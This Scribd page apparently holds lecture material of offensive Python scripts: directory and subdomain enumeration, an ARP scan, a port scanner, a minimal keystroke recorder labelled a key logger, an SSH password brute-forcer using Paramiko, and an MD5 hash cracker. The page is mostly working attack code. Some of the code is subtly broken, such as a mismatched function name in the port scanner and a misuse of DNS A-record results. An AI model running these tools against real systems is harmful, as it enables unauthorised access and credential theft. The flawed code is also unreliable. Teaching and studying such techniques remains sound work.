Scribd
Upload
41 views

Lecture 9 Python Script

The first script enumerates directories on a web server by checking HTTP response codes for specific URLs. The second uses a port scanner to probe a target IP for open ports within a specified range. The third uses Paramiko to perform SSH brute force attack by attempting to connect with username and passwords

Uploaded by

Max Riddle
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
41 views

Lecture 9 Python Script

The first script enumerates directories on a web server by checking HTTP response codes for specific URLs. The second uses a port scanner to probe a target IP for open ports within a specified range. The third uses Paramiko to perform SSH brute force attack by attempting to connect with username and passwords

Uploaded by

Max Riddle
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 5

Python script that performs directory enumeration on a

web server using a wordlist


import requests
import sys
sub_list = open("wordlist.txt").read()
directories = sub_list.splitlines()
for dir in directories:
dir_enum = f"http://{sys.argv[1]}/{dir}.html"
r = requests.get(dir_enum)
if r.status_code==404:
pass
else:
print("Valid directory:" ,dir_enum)

script attempts to enumerate subdomains by resolving


DNS records and then checks if these subdomains are
accessible over HTTP.
import dns.resolver
import sys
def enumerate_subdomains(base_domain):
subdomains = []
try:
answers = dns.resolver.resolve(base_domain, 'A')
for rdata in answers:
subdomains.append(rdata.target)
except dns.resolver.NXDOMAIN:
print(f"No DNS record found for {base_domain}")
return subdomains

if len(sys.argv) != 2:
print("Usage: python script.py <base_domain>")
sys.exit(1)

base_domain = sys.argv[1]
subdomains = enumerate_subdomains(base_domain)

for sub in subdomains:


sub_domain = f"http://{sub}"
try:
response = requests.get(sub_domain)
if response.status_code == 200:
print("Valid domain:", sub_domain)
except requests.ConnectionError:
pass

script appears to enumerate directories by checking if


specific URLs are valid based on the HTTP response code
import requests
import sys

def enumerate_directories(base_url, directory_list):


valid_directories = []

for directory in directory_list:


dir_url = f"{base_url}/{directory}.html"
response = requests.get(dir_url)

if response.status_code != 404:
valid_directories.append(dir_url)

return valid_directories

if len(sys.argv) != 2:
print("Usage: python script.py <base_url>")
sys.exit(1)

base_url = sys.argv[1]

directory_list = open("wordlist.txt").read().splitlines()
valid_directories = enumerate_directories(base_url, directory_list)

for valid_dir in valid_directories:


print("Valid directory:", valid_dir)

Scapy to perform an ARP scan within a specified IP range


from scapy.all import *

interface = "eth0"
ip_range = "10.10.X.X/24"
broadcastMac = "ff:ff:ff:ff:ff:ff"

packet = Ether(dst=broadcastMac)/ARP(pdst = ip_range)

ans, unans = srp(packet, timeout =2, iface=interface, inter=0.1)

for send,receive in ans:


print (receive.sprintf(r"%Ether.src% - %ARP.psrc%"))

Port Scanner
import sys
import socket
def probeport(ip, port, result = 1):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
r = sock.connect_ex((ip, port))
if r == 0:
result = r
sock.close()
except Exception as e:
pass
return result

for port in ports:


sys.stdout.flush()
response = probe_port(ip, port)
if response == 0:
open_ports.append(port)

if open_ports:
print ("Open Ports are: ")
print (sorted(open_ports))
else:
print ("Looks like no ports are open :(")
ip = '192.168.1.6'
open_ports =[]

ports = range(1, 65535)

ports = { 137, 139, 23, 53, 80, 135, 443, 445}

Key Logger
import keyboard
keys = keyboard.record(until ='ENTER')
keyboard.play(keys)

bruteforce an SSH server using the Paramiko library in Python


import paramiko

target = str(input('Please enter target IP address: '))


username = str(input('Please enter username to bruteforce: '))
password_file = str(input('Please enter location of the password file: '))

def ssh_connect(password):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

try:
ssh.connect(target, port=22, username=username, password=password)
print('Password found: ' + password)
return True
except paramiko.AuthenticationException:
print('Incorrect password: ' + password)
return False
except Exception as e:
print(e)
finally:
ssh.close()

with open(password_file, 'r') as file:


for line in file.readlines():
password = line.strip()
if ssh_connect(password):
exit(0)

print('Password not found in the provided wordlist.')

script to crack an MD5 hash using a wordlist


import hashlib

wordlist_location = str(input('Enter wordlist file location: '))


hash_input = str(input('Enter hash to be cracked: '))

with open(wordlist_location, 'r') as file:


for line in file.readlines():
hash_ob = hashlib.md5(line.strip().encode())
hashed_pass = hash_ob.hexdigest()
if hashed_pass == hash_input:
print('Found cleartext password! ' + line.strip())
exit(0)

You might also like